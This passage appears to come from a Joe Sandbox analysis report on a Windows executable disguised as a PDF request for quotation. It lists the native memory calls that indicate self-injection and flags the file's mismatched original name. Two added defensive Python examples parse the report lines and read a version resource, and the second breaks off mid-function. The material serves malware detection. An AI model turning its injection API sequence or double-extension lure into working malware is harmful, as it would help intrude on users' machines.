Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C31 0_2_020B7C31
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C7A 0_2_020B7C7A
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9C88 0_2_020B9C88
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C85 0_2_020B7C85
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9C95 0_2_020B9C95
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7CA9 0_2_020B7CA9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9CAD 0_2_020B9CAD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9CA1 0_2_020B9CA1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8CFB 0_2_020B8CFB
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9CFD 0_2_020B9CFD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9CF1 0_2_020B9CF1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9D09 0_2_020B9D09
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7D25 0_2_020B7D25
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7D31 0_2_020B7D31
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FFD9 8_2_0056FFD9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FFC0 8_2_0056FFC0
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FFE5 8_2_0056FFE5
Contains functionality to call native functions
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B2725 NtWriteVirtualMemory,TerminateProcess, 0_2_020B2725
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9405 NtAllocateVirtualMemory, 0_2_020B9405
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BEA59 NtWriteVirtualMemory,NtProtectVirtualMemory, 0_2_020BEA59
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BEF41 NtOpenFile, 0_2_020BEF41
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8209 NtWriteVirtualMemory, 0_2_020B8209
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8215 NtWriteVirtualMemory, 0_2_020B8215
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8221 NtWriteVirtualMemory, 0_2_020B8221
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B826D NtWriteVirtualMemory, 0_2_020B826D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8279 NtWriteVirtualMemory, 0_2_020B8279
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8285 NtWriteVirtualMemory, 0_2_020B8285
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B82ED NtWriteVirtualMemory, 0_2_020B82ED
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B82F9 NtWriteVirtualMemory, 0_2_020B82F9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8308 NtWriteVirtualMemory, 0_2_020B8308
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8369 NtWriteVirtualMemory, 0_2_020B8369
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B83E1 NtWriteVirtualMemory, 0_2_020B83E1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8031 NtWriteVirtualMemory, 0_2_020B8031
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8086 NtWriteVirtualMemory, 0_2_020B8086
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B809D NtWriteVirtualMemory, 0_2_020B809D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8091 NtWriteVirtualMemory, 0_2_020B8091
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B80A9 NtWriteVirtualMemory, 0_2_020B80A9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8105 NtWriteVirtualMemory, 0_2_020B8105
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B811D NtWriteVirtualMemory, 0_2_020B811D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8111 NtWriteVirtualMemory, 0_2_020B8111
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8129 NtWriteVirtualMemory, 0_2_020B8129
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81B9 NtWriteVirtualMemory, 0_2_020B81B9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81C5 NtWriteVirtualMemory, 0_2_020B81C5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81DD NtWriteVirtualMemory, 0_2_020B81DD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81D1 NtWriteVirtualMemory, 0_2_020B81D1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B81F8 NtWriteVirtualMemory, 0_2_020B81F8
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8609 NtWriteVirtualMemory, 0_2_020B8609
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B760D NtWriteVirtualMemory, 0_2_020B760D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7619 NtWriteVirtualMemory, 0_2_020B7619
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8615 NtWriteVirtualMemory, 0_2_020B8615
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9629 NtAllocateVirtualMemory, 0_2_020B9629
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B862D NtWriteVirtualMemory, 0_2_020B862D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8621 NtWriteVirtualMemory, 0_2_020B8621
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7625 NtWriteVirtualMemory, 0_2_020B7625
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7631 NtWriteVirtualMemory, 0_2_020B7631
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9635 NtAllocateVirtualMemory, 0_2_020B9635
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B964D NtAllocateVirtualMemory, 0_2_020B964D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9641 NtAllocateVirtualMemory, 0_2_020B9641
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7664 NtWriteVirtualMemory, 0_2_020B7664
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9685 NtAllocateVirtualMemory, 0_2_020B9685
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B76B9 NtWriteVirtualMemory, 0_2_020B76B9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B76C5 NtWriteVirtualMemory, 0_2_020B76C5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B86C4 NtWriteVirtualMemory, 0_2_020B86C4
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B76DD NtWriteVirtualMemory, 0_2_020B76DD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B76D1 NtWriteVirtualMemory, 0_2_020B76D1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B96FD NtAllocateVirtualMemory, 0_2_020B96FD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B86FC NtWriteVirtualMemory, 0_2_020B86FC
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B870C NtWriteVirtualMemory, 0_2_020B870C
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B871D NtWriteVirtualMemory, 0_2_020B871D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8729 NtWriteVirtualMemory, 0_2_020B8729
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7739 NtWriteVirtualMemory, 0_2_020B7739
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8735 NtWriteVirtualMemory, 0_2_020B8735
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7745 NtWriteVirtualMemory, 0_2_020B7745
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B775D NtWriteVirtualMemory, 0_2_020B775D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7751 NtWriteVirtualMemory, 0_2_020B7751
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B776E NtWriteVirtualMemory, 0_2_020B776E
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7790 NtWriteVirtualMemory, 0_2_020B7790
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9481 NtAllocateVirtualMemory, 0_2_020B9481
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B94CA NtAllocateVirtualMemory, 0_2_020B94CA
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B94C8 NtAllocateVirtualMemory, 0_2_020B94C8
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B84C5 NtWriteVirtualMemory, 0_2_020B84C5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B94D5 NtAllocateVirtualMemory, 0_2_020B94D5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B94ED NtAllocateVirtualMemory, 0_2_020B94ED
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B94E1 NtAllocateVirtualMemory, 0_2_020B94E1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B74FD NtWriteVirtualMemory, 0_2_020B74FD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B74F1 NtWriteVirtualMemory, 0_2_020B74F1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B850C NtWriteVirtualMemory, 0_2_020B850C
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9518 NtAllocateVirtualMemory, 0_2_020B9518
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B752E NtWriteVirtualMemory, 0_2_020B752E
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7539 NtWriteVirtualMemory, 0_2_020B7539
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7545 NtWriteVirtualMemory, 0_2_020B7545
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B959E NtAllocateVirtualMemory, 0_2_020B959E
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8594 NtWriteVirtualMemory, 0_2_020B8594
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B95A9 NtAllocateVirtualMemory, 0_2_020B95A9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B85AD NtWriteVirtualMemory, 0_2_020B85AD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B85A1 NtWriteVirtualMemory, 0_2_020B85A1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B85B9 NtWriteVirtualMemory, 0_2_020B85B9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B95B5 NtAllocateVirtualMemory, 0_2_020B95B5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B95CD NtAllocateVirtualMemory, 0_2_020B95CD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B95C1 NtAllocateVirtualMemory, 0_2_020B95C1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B75E9 NtWriteVirtualMemory, 0_2_020B75E9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7A12 NtWriteVirtualMemory, 0_2_020B7A12
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7A7D NtWriteVirtualMemory, 0_2_020B7A7D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7A71 NtWriteVirtualMemory, 0_2_020B7A71
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7A89 NtWriteVirtualMemory, 0_2_020B7A89
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7AED NtWriteVirtualMemory, 0_2_020B7AED
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7B4D NtWriteVirtualMemory, 0_2_020B7B4D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7B41 NtWriteVirtualMemory, 0_2_020B7B41
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7B59 NtWriteVirtualMemory, 0_2_020B7B59
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7B65 NtWriteVirtualMemory, 0_2_020B7B65
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7BBD NtWriteVirtualMemory, 0_2_020B7BBD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7BC9 NtWriteVirtualMemory, 0_2_020B7BC9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7BD5 NtWriteVirtualMemory, 0_2_020B7BD5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7BE1 NtWriteVirtualMemory, 0_2_020B7BE1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B782D NtWriteVirtualMemory, 0_2_020B782D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B887D NtWriteVirtualMemory, 0_2_020B887D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7880 NtWriteVirtualMemory, 0_2_020B7880
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7899 NtWriteVirtualMemory, 0_2_020B7899
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B78A5 NtWriteVirtualMemory, 0_2_020B78A5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7915 NtWriteVirtualMemory, 0_2_020B7915
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B792D NtWriteVirtualMemory, 0_2_020B792D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7921 NtWriteVirtualMemory, 0_2_020B7921
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B799D NtWriteVirtualMemory, 0_2_020B799D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7991 NtWriteVirtualMemory, 0_2_020B7991
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B79A9 NtWriteVirtualMemory, 0_2_020B79A9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E40 NtWriteVirtualMemory, 0_2_020B7E40
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E47 NtWriteVirtualMemory, 0_2_020B7E47
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E59 NtWriteVirtualMemory, 0_2_020B7E59
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E65 NtWriteVirtualMemory, 0_2_020B7E65
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E79 NtWriteVirtualMemory, 0_2_020B7E79
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7EC2 NtWriteVirtualMemory, 0_2_020B7EC2
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7F3D NtWriteVirtualMemory, 0_2_020B7F3D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7F31 NtWriteVirtualMemory, 0_2_020B7F31
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7F81 NtWriteVirtualMemory, 0_2_020B7F81
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7FA5 NtWriteVirtualMemory, 0_2_020B7FA5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C3D NtWriteVirtualMemory, 0_2_020B7C3D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C31 NtWriteVirtualMemory, 0_2_020B7C31
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C7A NtWriteVirtualMemory, 0_2_020B7C7A
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C85 NtWriteVirtualMemory, 0_2_020B7C85
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7CA9 NtWriteVirtualMemory, 0_2_020B7CA9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8CFB NtWriteVirtualMemory, 0_2_020B8CFB
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7D25 NtWriteVirtualMemory, 0_2_020B7D25
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7D31 NtWriteVirtualMemory, 0_2_020B7D31
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FD07 LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FD07
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FEC2 Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FEC2
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FD59 NtProtectVirtualMemory, 8_2_0056FD59
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FD4D NtProtectVirtualMemory, 8_2_0056FD4D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FF79 NtProtectVirtualMemory, 8_2_0056FF79
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FE11 NtProtectVirtualMemory, 8_2_0056FE11
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FD00 LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FD00
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FF09 NtProtectVirtualMemory, 8_2_0056FF09
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FD30 NtProtectVirtualMemory, 8_2_0056FD30
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FC21 LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FC21
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FC96 LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FC96
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FD9D NtProtectVirtualMemory, 8_2_0056FD9D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FE85 NtProtectVirtualMemory, 8_2_0056FE85
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FDB5 NtProtectVirtualMemory, 8_2_0056FDB5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FCB9 NtProtectVirtualMemory, 8_2_0056FCB9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FCA1 LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FCA1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FCAD LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FCAD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FEAD LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FEAD
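Read per process rather than per function, the native-call listing above shows the first process (index 0, the `0_2_` lines) reaching all three stages of a self-injection sequence: NtAllocateVirtualMemory to reserve memory, NtWriteVirtualMemory to fill it, NtProtectVirtualMemory to change its page protection. The copy the sample spawns (index 8, the `8_2_` lines) only shows NtProtectVirtualMemory, usually after LdrInitializeThunk. The call sites at 020Bxxxx and 0056xxxx lie outside the mapped image, whose own code sits at 0040xxxx, and are the same regions the Yara rule matches in the Data Obfuscation section. The script below is an added example and not part of the Joe Sandbox report: it parses lines in the report's own `Code function:` format (a handful copied from the listing) and applies an assumed triage rule, flagging a process that both allocates and writes memory as injection-capable and one that only re-protects pages as weaker evidence.

```python
import re
from collections import defaultdict

# Lines in the report's own "Code function" format, copied from the listing above.
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9A35 0_2_020B9A35",
    r"Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B2725 NtWriteVirtualMemory,TerminateProcess, 0_2_020B2725",
    r"Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9405 NtAllocateVirtualMemory, 0_2_020B9405",
    r"Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BEA59 NtWriteVirtualMemory,NtProtectVirtualMemory, 0_2_020BEA59",
    r"Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BEF41 NtOpenFile, 0_2_020BEF41",
    r"Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FEC2 Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 8_2_0056FEC2",
    r"Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 8_2_0056FD59 NtProtectVirtualMemory, 8_2_0056FD59",
]

# <process index>_<stage>_<start address> [api,api,] <process index>_<stage>_<end address>
LINE_RE = re.compile(
    r"Code function: (?P<pid>\d+)_\d+_(?P<start>[0-9A-Fa-f]+)"
    r"(?: (?P<apis>[A-Za-z0-9_,]+),)? \d+_\d+_[0-9A-Fa-f]+\s*$"
)

# Assumed mapping from native call to the stage of a typical self-injection sequence.
STAGES = {
    "allocate": "NtAllocateVirtualMemory",   # reserve a region for the next stage
    "write": "NtWriteVirtualMemory",         # copy the payload into it
    "protect": "NtProtectVirtualMemory",     # make it executable (or hide it again)
}


def parse_line(line):
    """Return (process index, start address, [API names]) or None for non-matching lines."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    apis = [a for a in (m.group("apis") or "").split(",") if a]
    return m.group("pid"), m.group("start").upper(), apis


def triage(lines):
    """Aggregate Nt* calls per process and apply the assumed injection rule."""
    native = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        pid, _start, apis = parsed
        native[pid].update(a for a in apis if a.startswith("Nt"))

    result = {}
    for pid, apis in native.items():
        stages = sorted(name for name, api in STAGES.items() if api in apis)
        if "allocate" in stages and "write" in stages:
            verdict = "injection-capable"           # stages a payload in memory it controls
        elif "protect" in stages:
            verdict = "memory-permission-change"    # weaker alone: JIT engines and packers do this too
        else:
            verdict = "none"
        result[pid] = {"native_apis": sorted(apis), "stages": stages, "verdict": verdict}
    return result


if __name__ == "__main__":
    for pid, info in sorted(triage(REPORT_LINES).items()):
        print(pid, info["verdict"], info["stages"])
```

To run it over a whole report, split the saved page into lines and pass them to `triage`; the rule is deliberately coarse, so a "memory-permission-change" verdict on its own should be confirmed against the memory dumps before it is treated as injection.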
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000000.670357074.000000000041C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameForm_Fejlfunkt.exe vs RFQ 001030112021#U00b7pdf.exe
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770681442.0000000002960000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameForm_Fejlfunkt.exeFE2X vs RFQ 001030112021#U00b7pdf.exe
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000000.769293326.000000000041C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameForm_Fejlfunkt.exe vs RFQ 001030112021#U00b7pdf.exe
Source: RFQ 001030112021#U00b7pdf.exe Binary or memory string: OriginalFilenameForm_Fejlfunkt.exe vs RFQ 001030112021#U00b7pdf.exe
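The `OriginalFilename` value above comes from the PE's VS_VERSIONINFO resource, where each `String` entry is a 6-byte header (wLength, wValueLength in UTF-16 words, wType) followed by a null-terminated UTF-16 key, optional 32-bit alignment padding, and the UTF-16 value. The code below is an added example, not part of the report: it constructs a version-resource fragment carrying the same `Form_Fejlfunkt.exe` value (the blob is test data, not the sample's real resource), reads the entry back from raw bytes as it would from a file or memory dump, and compares it with the name the file runs under, which is the check this signature performs. `build_string_entry` exists only to construct that test data.

```python
import struct

KEY = "OriginalFilename".encode("utf-16-le") + b"\x00\x00"


def build_string_entry(key, value):
    """Construct one VS_VERSIONINFO 'String' entry (test data only):
    wLength, wValueLength (UTF-16 words), wType=1 (text), szKey, padding, value."""
    k = key.encode("utf-16-le") + b"\x00\x00"
    v = value.encode("utf-16-le") + b"\x00\x00"
    body = k
    if (6 + len(body)) % 4:                      # value must start on a 32-bit boundary
        body += b"\x00\x00"
    body += v
    entry = struct.pack("<HHH", 6 + len(body), len(v) // 2, 1) + body
    return entry + b"\x00" * (-len(entry) % 4)   # pad to the next 32-bit boundary


# Constructed fragment with the OriginalFilename the report found; not the sample's resource.
SAMPLE_BLOB = (
    b"\x00" * 16
    + build_string_entry("FileVersion", "1.00")
    + build_string_entry("OriginalFilename", "Form_Fejlfunkt.exe")
    + b"\x00" * 8
)


def read_original_filename(data):
    """Locate the 'OriginalFilename' String entry in raw bytes and return its value, or None."""
    pos = data.find(KEY)
    if pos < 6:                                  # not found, or no room for the header
        return None
    _w_length, w_value_length, w_type = struct.unpack_from("<HHH", data, pos - 6)
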